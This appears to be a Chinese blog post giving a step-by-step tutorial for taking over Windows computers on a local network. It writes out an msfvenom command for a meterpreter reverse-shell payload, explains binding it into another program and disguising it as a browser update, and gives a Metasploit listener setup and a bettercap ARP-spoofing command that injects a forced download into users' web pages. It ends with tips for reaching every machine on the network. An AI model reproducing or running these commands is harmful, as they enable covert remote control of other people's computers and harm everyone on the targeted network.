分享

arp欺骗:控制局域网任意windows计算机

 西北望msm66g9f 2018-06-16

arp欺骗:控制局域网任意windows计算机


阅读目录

  

目的

准备

metaspolit小马的准备

打开msf的控制台,开始监听本地的端口

bettercap执行Arp欺骗

欺骗全部计算机:

问题:

  目的

  通过Arp欺骗, 给局域网内的所有用户网页中植入木马, 只要用户运行以后, 就会反弹一个shell到我们计算机

  准备

  kali系统

  metaspolit的使用

  Arp欺骗工具:bettercap

  metaspolit小马的准备

  因为我本地的ip为151, 溢出后反弹的端口为444, 使用msfvenom生成名字为run1.exe的小马文件:

==================

运行下面代码

msfvenom -p  windows/meterpreter/reverse_tcp LHOST=192.168.1.151 LPORT=444 -f exe > run1.exe

=================

  文件是生成了,再把生成的小马文件和其它exe合并, 避免用户下载文件的时候起疑, 我使用exebind这个老工具(关注公众号程序IT,向作者要):

  把生成的exe文件放到服务器上, 我是把文件压缩以后,  文件名字改为浏览器更新程序, 用户就会以为要更新文件, 然后去下载并打开这个文件

  打开msf的控制台,开始监听本地的端口

运行下面代码

use exploit/multi/handlerset lhost 192.168.1.151set lport 444set payload windows/meterpreter/reverse_tcpexploit

  bettercap执行Arp欺骗

  bettercap参考官网, 此处省略1W字(关注公众号:codepro), 使用bettercap的添加html模块, 给所有的HTTP页面添加JS代码, 当用户点击body标签的时候 , 自动打开新窗口并下载一个exe文件, 命令行的参数最好添加-G指定网关, 添加-T添加攻击主机, 如果没有指定-T参数, 会欺骗局域网内部的所有设备, 欺骗越多, 别人越卡:

运行下面代码

sudo bettercap -I wlan0 -X  -T 192.168.1.150  -G 192.168.1.1  --proxy-module=injecthtml --html-data ''

  问题:

  因为Arp欺骗的缘故, 导致被攻击的机器, 浏览网页的速度超级慢

  如果用户浏览器网页的时候, 如果走的是Https协议的话 , 无法添加自定义代码到Html页面中

  放在服务器上的小马文件, 最好要把http改成https, 否者, 用户下载文件的时候非常慢

  本次渗透只是拿我的虚拟机进行个人测试,并没有搞破坏

  在虚拟机的情况下, 直接外接usb无线网卡, 然后把网桥关闭, 避免bettercap的arp -a的时候出问题

  需要攻击的时候,最好指定目标电脑的IP地址和局域网网关, 会更加保险, 确保能够攻击, 如果bettercap一条信息都没有嗅探到, 就要看看是不是哪里出问题了

  如果要攻击一整个局域网的时候, 最好把需要攻击的电脑先ping通, 避免kali系统没找到路由表信息, 出现漏网之鱼。


    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多